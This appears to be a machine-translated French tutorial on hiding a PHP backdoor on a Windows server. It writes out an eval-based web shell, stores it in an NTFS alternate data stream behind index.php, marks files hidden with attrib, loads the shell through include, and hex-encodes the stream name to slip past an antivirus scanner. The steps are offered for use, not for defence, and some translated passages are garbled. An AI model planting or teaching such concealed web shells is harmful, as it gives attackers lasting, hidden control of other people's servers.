Maison  >  Article  >  développement back-end  >  Comment masquer la porte dérobée en php ?

Comment masquer la porte dérobée en php ?

coldplay.xixi
coldplay.xixioriginal
2020-07-24 11:26:133400parcourir

Comment masquer la porte dérobée en PHP : créez d'abord un fichier caché système et créez un fichier caché ADS ; puis utilisez jpd en incluant enfin le fichier encodé en hexadécimal [index.php:shell.jpg] .

Comment masquer la porte dérobée en php ?

Comment masquer la porte dérobée en php :

attribut +s +h

Créer des fichiers cachés du système.

/ attrib +s +a +r +hNom du fichierattrib +s +h

Comment masquer la porte dérobée en php ?

Afficher les fichiers cachés

Comment masquer la porte dérobée en php ?

2. Utilisez ADS pour masquer les fichiers

Les flux de données alternatifs NTFS (ADS en abrégé) sont une fonctionnalité du format de disque NTFS sous. le système de fichiers, chaque fichier peut avoir plusieurs flux de données. L'interprétation populaire est que d'autres fichiers peuvent être « hébergés » sur un certain fichier, mais dans le gestionnaire de ressources, seul le fichier hôte peut être vu et le fichier hôte est introuvable. Nous pouvons faire beaucoup de choses intéressantes avec les flux de données ADS. (Copié)

1. Créez d'abord le fichier caché ADS

Dans la ligne de commande, faites écho à un flux de données dans, par exemple, le le fichier d'index est un document normal.

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

Cela génère un index.php:shell.jpg invisible

Comment masquer la porte dérobée en php ?

Vous pouvez le visualiser avec la commande

dir/r

Comment masquer la porte dérobée en php ?

Modification et suppression

Modification :

Entrez le répertoire où se trouve le fichier, notepad index.php:shell.jpg

Comment masquer la porte dérobée en php ?

Comment supprimer index.php:shell.jpg ?

Supprimez directement index.php

Comment masquer la porte dérobée en php ?

2 Le fichier contient

Nous avons généré index.php:shell. .jpg, peut être utilisé en incluant le fichier.

<?php include(‘index.php:shell.jpg‘)?>

Partage technique d'images

Comment masquer la porte dérobée en php ?

Vous pouvez également utiliser le include.php caché que vous avez appris ci-dessus

Comment masquer la porte dérobée en php ?

3. Évitez de tuer

Ça ne marche pas même si vous le cachez, frère dei, le bouclier D explose instantanément lorsque vous le balayez.

Comment masquer la porte dérobée en php ?

Hex encode index.php:shell.jpg

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>

Comment masquer la porte dérobée en php ?

Recommandations d'apprentissage associées :

Programmation PHP du débutant au maître

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn